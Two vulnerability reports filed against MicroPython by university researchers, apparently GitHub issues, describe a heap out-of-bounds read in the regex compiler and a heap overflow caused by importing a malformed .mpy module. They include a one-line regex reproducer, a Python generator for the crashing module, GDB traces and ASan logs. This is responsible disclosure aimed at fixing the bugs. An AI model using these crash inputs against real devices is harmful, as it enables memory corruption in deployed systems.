heap buffer overflow found at micropython/lib/re1.5/compilecode.c:68 [micropython@a5bdd39127]
Hi all, I'm Wonil Jang, from the research group S2Lab in UNIST.
We found a heap buffer overflow bug from micropython by our custom tool. The detailed information is as follows.
Environment
- OS: Ubuntu 22.04
- Version: micropython at commit a5bdd39127
- Build: unix ports
- Bug Type: heap-buffer-overflow
- Bug Location: micropython/lib/re1.5/compilecode.c:68
- Credits: Junwha Hong and Wonil Jang, from S2Lab in UNIST
Problem Statement
...
case '[': {
int cnt;
term = PC;
re++;
if (*re == '^') {
EMIT(PC++, ClassNot);
re++;
} else {
EMIT(PC++, Class);
}
PC++; // Skip # of pair byte
prog->len++;
for (cnt = 0; *re != ']'; re++, cnt++) { <== [1]
char c = *re;
if (c == '\\') {
++re;
c = *re;
if (MATCH_NAMED_CLASS_CHAR(c)) {
c = RE15_CLASS_NAMED_CLASS_INDICATOR;
goto emit_char_pair;
}
}
if (!c) return NULL;
if (re[1] == '-' && re[2] != ']') { <== [2]
re += 2;
}
emit_char_pair:
EMIT(PC++, c);
EMIT(PC++, *re);
}
EMIT_CHECKED(term + 1, cnt);
break;
}
...
At [1], We found a heap-buffer-overflow bug. This is because there is no verification of regex string length.
For instance, If we have a regex string ([a-zA-Z_0-(null), it will process 0-(null) finally.
and then, at [2], re pointer will point to next byte after 0-(null).
Because It doesn’t have verification logic of regex string length, it will try to read a byte after 0-(null), which means out-of-bound read.
Example (replication)
>>> import re
>>> re.sub(r"([a-zA-Z_0-", "b", "1a2a3a")
=================================================================
#0 0x5555557b9461 in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:68:27
#1 0x5555557b97ed in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:103:18
#2 0x5555557b78da in re1_5_sizecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:194:9
#3 0x5555557b78da in mod_re_compile /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:427:16
#4 0x5555557b6cd7 in re_sub_helper /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:287:16
Patch
The simplest patch will be adding verification of regex re length.
Log
#0 0x5555557b9461 in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:68:27
#1 0x5555557b97ed in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:103:18
#2 0x5555557b78da in re1_5_sizecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:194:9
#3 0x5555557b78da in mod_re_compile /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:427:16
#4 0x5555557b6cd7 in re_sub_helper /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:287:16
#5 0x555555782c1c in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:1042:21
#6 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42
#7 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13
#8 0x555555902ad5 in do_file /home/qbit/testing-2023/micropython/ports/unix/main.c:310:12
#9 0x555555902ad5 in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:722:19
#10 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#11 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#12 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34)
Thank you for reading my report.
heap-buffer-over-flow(.mpy): from importing malformed npy module
Because this bug is complicated, it would be better to read this report from PDF report.
heap-buffer-overflow #1.pdf
Thank you for taking the time to review our bug report! :)
Summary
- OS: Ubuntu 22.04
- version: micropython@a00c9d56db775ee5fc14c2db60eb07bab8e872dd
- port: unix
- contribution: Junwha Hong and Wonil Jang @S2-Lab, UNIST
- description:
- Importing malformed .mpy module leads to buffer overflow at byte code executor
- A code chunk was allocated at persistentcode.c:249
- The chunk was accessed at at vm.c:311 by code pointer ip
- which was pre-determined at
mp_setup_code_state_helper(bc.c:140)
- which was pre-determined at
PoC Generation
PoC can be generated from bellow code, bof_module_gen.py
try:
import sys, io, os
sys.implementation._mpy
io.IOBase
os.mount
except (ImportError, AttributeError):
print("Error")
raise SystemExit
mpy_arch = sys.implementation._mpy >> 8
# these are the test .mpy files
valid_header = bytes([77, 6, mpy_arch, 31])
# fmt: off
user_files = {
# bad architecture (mpy_arch needed for sub-version)
'/mod1.mpy': valid_header + (
b'\x02' # n_qstr
b'\x00' # n_obj
b'\x02' # 2 children
b'\x42' # 8 bytes, no children, viper code
b'\x00[x00' # dummy machine code
),
}
# fmt: on
with open("bof_module.mpy", "wb") as f:
f.write(user_files['/mod1.mpy'])
micropython bof_module_gen.py
micropython -c "import bof_module"
Crash Log
#0 0x5555557855f4 in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c
#1 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42
#2 0x555555777269 in do_load /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c
#3 0x555555776022 in process_import_at_level /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c:512:9
#4 0x555555776022 in mp_builtin___import___default /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c:607:35
#5 0x5555557276b0 in mp_import_name /home/qbit/testing-2023/micropython/ports/unix/../../py/runtime.c:1525:12
#6 0x555555782770 in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:1235:21
#7 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42
#8 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13
#9 0x555555902f5d in do_str /home/qbit/testing-2023/micropython/ports/unix/main.c:314:12
#10 0x555555902f5d in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:635:23
#11 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#12 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#13 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34)
Description of malformed module
First of all, we need to keep in mind that how our malformed .npy module was loaded into micropython runtime.
hexdump -C bof_module.mpy
00000000 4d 06 0a 1f **02 00 02 42 00 5b 78 30 30** |M......B.[x00|
0000000d
architecture of .mpy file from docs
| size | field | value (hex) |
|---|---|---|
| byte | value 0x4d (ASCII ‘M’) | 4d |
| byte | .mpy major version number | 06 |
| byte | native arch and minor version number (was feature flags in older versions) | 0a |
| byte | number of bits in a small int | 1f |
little endian
| size | field | value (hex) |
|---|---|---|
| vuint | number of qstrs | 02 |
| vuint | number of constant objects | 00 |
| … | qstr data | {len, data} |
| {02>>1=01, 42} | ||
| {00>>1=00} | ||
| … | encoded constant objects | - |
| size | field | value |
|---|---|---|
| vuint | type, size and whether there are sub-raw-code elements | 5b (type=? |
| size=15) | ||
| … | code (bytecode or machine code) | ? |
| vuint | number of sub-raw-code elements (only if non-zero) | ? |
| … | sub-raw-code elements | ? |
If we validate this by GDB in runtime, from py/persistentcode.c:405.
(gdb) x/40b reader->data
0x7ffff7a05320: 0x60 0x53 0xa0 0xf7 0xff 0x7f 0x00 0x00
0x7ffff7a05328: 0x0d 0x00 0x00 0x00 0x4d 0x06 0x0a 0x1f
0x7ffff7a05330: 0x02 0x00 0x02 0x42 0x00 0x5b 0x78 0x30
0x7ffff7a05338: 0x30 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7ffff7a05340: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(0x00 will be 0xff)
From the memory map, it is clear that the valid code length is just 3 bytes, but it tries to read 15 bytes. thus, it reads 0xFF, which is EOF signal returned by mp_reader_vfs_readbyte.
STATIC mp_raw_code_t *load_raw_code(mp_reader_t *reader, mp_module_context_t *context) {
// Load function kind and data length
**size_t kind_len = read_uint(reader);**
int kind = (kind_len & 3) + MP_CODE_BYTECODE;
bool has_children = !!(kind_len & 4);
size_t fun_data_len = kind_len >> 3;
#if !MICROPY_EMIT_MACHINE_CODE
if (kind != MP_CODE_BYTECODE) {
mp_raise_ValueError(MP_ERROR_TEXT("incompatible .mpy file"));
}
#endif
uint8_t *fun_data = NULL;
#if MICROPY_EMIT_MACHINE_CODE
size_t prelude_offset = 0;
mp_uint_t native_scope_flags = 0;
mp_uint_t native_n_pos_args = 0;
mp_uint_t native_type_sig = 0;
#endif
if (kind == MP_CODE_BYTECODE) {
// Allocate memory for the bytecode
**fun_data = m_new(uint8_t, fun_data_len);
// Load bytecode
read_bytes(reader, fun_data, fun_data_len);**
...
but the root cause is here (although neglecting file reader EOF is also a problem), but at the actual parsing code of this 15 bytes fun_data .
Problem Statement
How was the chunk rc→fun_data accessed with out-of-bound index?
STATIC void do_load(mp_module_context_t *module_obj, vstr_t *file) {
...
mp_raw_code_load_file(**file_qstr**, &cm); <- allocation
do_execute_raw_code(cm.context, cm.rc, **file_qstr**); <- bof
...
by inserting breakpoint on the allocation site of fun_data, we can get the information of the chunk fun_data
b persistentcode.c:249
run
fun_data: [0x7ffff7a053c0, 0x7ffff7a053cf)fun_data_len: 15
Also, if we check the further executions with n command, it is clear that fun_data is shipped into bytecode field of the function object.
mp_obj_t mp_make_function_from_raw_code(const mp_raw_code_t *rc, const mp_module_context_t *context, const mp_obj_t *def_args) {
DEBUG_OP_printf("make_function_from_raw_code %p\n", rc);
assert(rc != NULL);
// def_args must be MP_OBJ_NULL or a tuple
assert(def_args == NULL || def_args[0] == MP_OBJ_NULL || mp_obj_is_type(def_args[0], &mp_type_tuple));
// def_kw_args must be MP_OBJ_NULL or a dict
assert(def_args == NULL || def_args[1] == MP_OBJ_NULL || mp_obj_is_type(def_args[1], &mp_type_dict));
// make the function, depending on the raw code kind
mp_obj_t fun;
switch (rc->kind) {
...
default:
// rc->kind should always be set and BYTECODE is the only remaining case
assert(rc->kind == MP_CODE_BYTECODE);
**fun = mp_obj_new_fun_bc(def_args, rc->fun_data, context, rc->children);**
...
mp_obj_t mp_obj_new_fun_bc(const mp_obj_t *def_args, const byte *code, const mp_module_context_t *context, struct _mp_raw_code_t *const *child_table) {
...
mp_obj_fun_bc_t *o = mp_obj_malloc_var(mp_obj_fun_bc_t, mp_obj_t, n_extra_args, &mp_type_fun_bc);
o->bytecode = code;
...
return MP_OBJ_FROM_PTR(o);
}
(gdb) x/10g o
0x7ffff7a05300: 0x00005555556313a0 0x0000000000000000
0x7ffff7a05310: 0x0000000000000000 0x00007ffff7a053c0
0x7ffff7a05320: 0x00000000000000ba 0x0000000000001f12
0x7ffff7a05330: 0x0000000000000b12 0x0000000000001f1a
0x7ffff7a05340: 0x0000000000000000 0x0000000000000000
From the generated module_fun, it executes a function (our target chunk is now in module_fun.bytecode)
mp_obj_t module_fun = mp_make_function_from_raw_code(rc, context, NULL);
mp_call_function_0(module_fun);
And we observed that the code_state→self function has the overflowed ip field exactly after INIT_CODESTATE.
STATIC mp_obj_t fun_bc_call(mp_obj_t self_in, size_t n_args, size_t n_kw, const mp_obj_t *args) {
...
mp_obj_fun_bc_t *self = MP_OBJ_TO_PTR(self_in); // 0x7ffff7a05300
size_t n_state, state_size; // 7, 56
DECODE_CODESTATE_SIZE(self->bytecode, n_state, state_size);
// allocate state for locals and stack
mp_code_state_t *code_state = NULL;
#if MICROPY_ENABLE_PYSTACK
code_state = mp_pystack_alloc(offsetof(mp_code_state_t, state) + state_size);
#else
if (state_size > VM_MAX_STATE_ON_STACK) {
code_state = m_new_obj_var_maybe(mp_code_state_t, state, byte, state_size);
#if MICROPY_DEBUG_VM_STACK_OVERFLOW
if (code_state != NULL) {
memset(code_state->state, 0, state_size);
}
#endif
}
if (code_state == NULL) {
code_state = alloca(offsetof(mp_code_state_t, state) + state_size);
#if MICROPY_DEBUG_VM_STACK_OVERFLOW
memset(code_state->state, 0, state_size);
#endif
state_size = 0; // indicate that we allocated using alloca
}
#endif
**INIT_CODESTATE(code_state, self, n_state, n_args, n_kw, args);**
// execute the byte code with the correct globals context
mp_globals_set(self->context->module.globals);
**mp_vm_return_kind_t vm_return_kind = mp_execute_bytecode(code_state, MP_OBJ_NULL); <- BOF Access**
...
}
Further investigation of INIT_CODESTATE
INIT_CODESTATE is caller macro of mp_setup_code_state function
#define INIT_CODESTATE(code_state, _fun_bc, _n_state, n_args, n_kw, args) \
code_state->fun_bc = _fun_bc; \
code_state->n_state = _n_state; \
mp_setup_code_state(code_state, n_args, n_kw, args); \
code_state->old_globals = mp_globals_get();
we can observe that ip is set as bytecode (the chunk [0x7ffff7a053c0, 0x7ffff7a053cf)) at mp_setup_code_state. till now, the ip is in valid state.
void mp_setup_code_state(mp_code_state_t *code_state, size_t n_args, size_t n_kw, const mp_obj_t *args) {
code_state->ip = code_state->fun_bc->bytecode; // 0x7ffff7a053c0
code_state->sp = &code_state->state[0] - 1;
#if MICROPY_STACKLESS
code_state->prev = NULL;
#endif
#if MICROPY_PY_SYS_SETTRACE
code_state->prev_state = NULL;
code_state->frame = NULL;
#endif
**mp_setup_code_state_helper(code_state, n_args, n_kw, args);**
}
b mp_setup_code_state
run
c
Inside mp_setup_code_state_helper, ip changes its value by ip = code_state->ip + n_info; and here, invalid address 0x7ffff7a053da is assigned.
⇒ It means that the n_info is the root cause!
// On entry code_state should be allocated somewhere (stack/heap) and
// contain the following valid entries:
// - code_state->fun_bc should contain a pointer to the function object
// **- code_state->ip should contain a pointer to the beginning of the prelude**
// - code_state->sp should be: &code_state->state[0] - 1
// - code_state->n_state should be the number of objects in the local state
STATIC void mp_setup_code_state_helper(mp_code_state_t *code_state, size_t n_args, size_t n_kw, const mp_obj_t *args) {
// This function is pretty complicated. It's main aim is to be efficient in speed and RAM
// usage for the common case of positional only args.
// get the function object that we want to set up (could be bytecode or native code)
mp_obj_fun_bc_t *self = code_state->fun_bc;
// Get cached n_state (rather than decode it again)
size_t n_state = code_state->n_state;
// Decode prelude
size_t n_state_unused, n_exc_stack_unused, scope_flags, n_pos_args, n_kwonly_args, n_def_pos_args;
**MP_BC_PRELUDE_SIG_DECODE_INTO(code_state->ip, n_state_unused, n_exc_stack_unused, scope_flags, n_pos_args, n_kwonly_args, n_def_pos_args);
MP_BC_PRELUDE_SIZE_DECODE(code_state->ip);**
(void)n_state_unused;
(void)n_exc_stack_unused;
...
// jump over code info (source file, argument names and line-number mapping)
**const uint8_t *ip = code_state->ip + n_info;**
// bytecode prelude: initialise closed over variables
for (; n_cell; --n_cell) {
size_t local_num = *ip++;
code_state_state[n_state - 1 - local_num] =
mp_obj_new_cell(code_state_state[n_state - 1 - local_num]);
}
// now that we skipped over the prelude, set the ip for the VM
**code_state->ip = ip;**
DEBUG_printf("Calling: n_pos_args=%d, n_kwonly_args=%d\n", n_pos_args, n_kwonly_args);
dump_args(code_state_state + n_state - n_pos_args - n_kwonly_args, n_pos_args + n_kwonly_args);
dump_args(code_state_state, n_state);
}
n_info was constructed over 15 (the allocated length for the code chunk), at MP_BC_PRELUDE_SIZE_DECODE.
#define MP_BC_PRELUDE_SIZE_DECODE(ip) \
size_t n_info, n_cell; \
MP_BC_PRELUDE_SIZE_DECODE_INTO(ip, n_info, n_cell); \
(void)n_info; (void)n_cell
#define MP_BC_PRELUDE_SIZE_DECODE_INTO(ip, I, C) \
do { \
uint8_t z; \
C = 0; \
I = 0; \
for (unsigned n = 0;; ++n) { \
z = *(ip)++; \
/* xIIIIIIC */ \
C |= (z & 1) << n; \
I |= ((z & 0x7e) >> 1) << (6 * n); \
if (!(z & 0x80)) { \
break; \
} \
} \
} while (0)
from GDB, we observed that MP_BC_PRELUDE_SIG_DECODE_INTO increases ip as 0x7ffff7a053c1, and then, MP_BC_PRELUDE_SIZE_DECODE reads n_info from there.
MP_BC_PRELUDE_SIG_DECODE_INTO read z as 2, (p printf("%d", ((char*)0x7ffff7a053c1)) ⇒ 2)
MP_BC_PRELUDE_SIZE_DECODE construct n_info by
at n == 0;
I |= ((z & 0x7e) >> 1) << (6 * n);
z & 0x7e = 0x80
0x80 >> 1 = 0x40
0x40 << (6*n) = 0x40
and, because next one is 0xFF it escape here
**=> n_info = 0x40 = 24 which is incorrectly rebase the code pointer ip later**
and after the first defined n_info, it was increased by 2 again, then the code pointer ip was rebased with the offset 26.
Thus, the root cause is that it does not validate the length of the code_state→ip before it rebase the ip.
To summarize,
- Chunk was allocated as: 0x7ffff7a053c0 with 0xf bytes => [0x7ffff7a053c0, 0x7ffff7a053cf)
- at persistentcode.c:249
- And accessed with out-of-bounds at: 0x7ffff7a053da (code pointer ip)
- at vm.c:311
- which was determined at
mp_setup_code_state_helper(bc.c:140)
Patch
To prevent this kind of malformed input leading to the buffer overflow, we need to move the length related parsing functions to parsers and enforcing the validation logic while reading the file.
Discussion
We think you already tested this kind of features in the tests of tests/micropython/import_mpy*.py, but it seems it’s not sufficient.
Also, this bug can be seemed not that critical because importing this module produce “NotImplementedError: opcode”, but it’s actually very critical because the out-of-bounds occurs before the NotImplementedError, and it means that this buffer-over-flow can affect runtime if a user has code like:
try:
import module_A # module_A is malformed by attacker
except:
import module_A_alternative
...
# Normal routine
Thank you for taking the time to review our bug report! :)